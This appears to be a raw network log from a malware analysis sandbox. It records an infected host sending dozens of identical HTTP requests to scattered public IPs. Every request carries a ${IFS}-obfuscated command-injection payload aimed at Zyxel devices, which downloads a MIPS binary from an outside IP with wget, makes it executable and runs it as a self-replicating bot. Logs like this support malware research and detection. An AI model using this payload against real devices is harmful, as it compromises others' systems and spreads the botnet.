                                                        Jan 28, 2024 10:13:09.737852097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8678192.168.2.1441936206.222.43.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737880945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8679192.168.2.144548459.10.63.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737925053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8680192.168.2.144242667.59.36.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737967968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8681192.168.2.145465662.184.182.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.737987995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8682192.168.2.1435616113.143.23.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738034010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8683192.168.2.144557671.250.212.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738074064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8684192.168.2.1433000217.210.6.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738099098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8685192.168.2.1434412138.68.111.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738154888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8686192.168.2.143381647.150.140.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738185883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8687192.168.2.1453498148.27.114.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738239050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8688192.168.2.1452244197.122.24.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738276958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8689192.168.2.144351871.66.241.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738333941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8690192.168.2.1439694155.2.182.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738404036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8691192.168.2.1459078158.114.57.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738445044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8692192.168.2.1447728207.174.68.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738481045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8693192.168.2.143609478.52.57.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738506079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8694192.168.2.145138432.243.59.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738554001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8695192.168.2.143443487.48.11.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738580942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8696192.168.2.1450510145.0.10.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738626957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8697192.168.2.1435750118.180.245.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738665104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8698192.168.2.145558281.202.243.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738709927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8699192.168.2.144208624.149.239.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738739967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8700192.168.2.144288019.107.46.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738769054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8701192.168.2.145792477.77.6.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738830090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8702192.168.2.143448036.190.11.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738842964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8703192.168.2.1437706179.205.192.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738898993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8704192.168.2.143893446.177.170.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738945007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8705192.168.2.144963485.58.193.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.738969088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8706192.168.2.1451388189.33.75.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739012003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8707192.168.2.144823071.223.68.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739053965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8708192.168.2.1441654213.7.226.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739101887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8709192.168.2.1454738176.225.87.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739130020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8710192.168.2.145031053.78.143.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739172935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8711192.168.2.1445832193.32.190.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739217043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8712192.168.2.1458618208.195.165.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739250898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8713192.168.2.144664240.181.233.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739296913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8714192.168.2.144723243.127.178.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739339113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8715192.168.2.1458456110.89.192.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739363909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8716192.168.2.14395301.217.169.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739393950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8717192.168.2.1438638221.89.123.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739430904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8718192.168.2.145208280.188.38.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739463091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8719192.168.2.1458298156.245.107.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739521027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8720192.168.2.143328494.144.119.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739557981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8721192.168.2.144054614.121.99.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739600897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8722192.168.2.1434568140.231.50.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739645004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8723192.168.2.1446056182.5.135.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739665031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8724192.168.2.143726494.228.149.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739712000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8725192.168.2.145518486.88.226.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739736080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8726192.168.2.145240052.11.64.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739765882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8727192.168.2.144120271.123.148.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739804029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8728192.168.2.143583823.91.34.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739860058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8729192.168.2.14510929.128.109.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739888906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8730192.168.2.145598491.34.73.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739936113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8731192.168.2.144211269.243.127.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.739963055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8732192.168.2.1434332210.136.230.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740005016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8733192.168.2.1457386176.85.8.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740035057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8734192.168.2.1435320150.213.60.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740071058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8735192.168.2.143508886.230.15.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740113020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8736192.168.2.1449156176.198.17.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740151882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8737192.168.2.1446768174.87.3.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.740190029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8738192.168.2.1444768106.248.24.250443
                                                        TimestampBytes transferredDirectionData
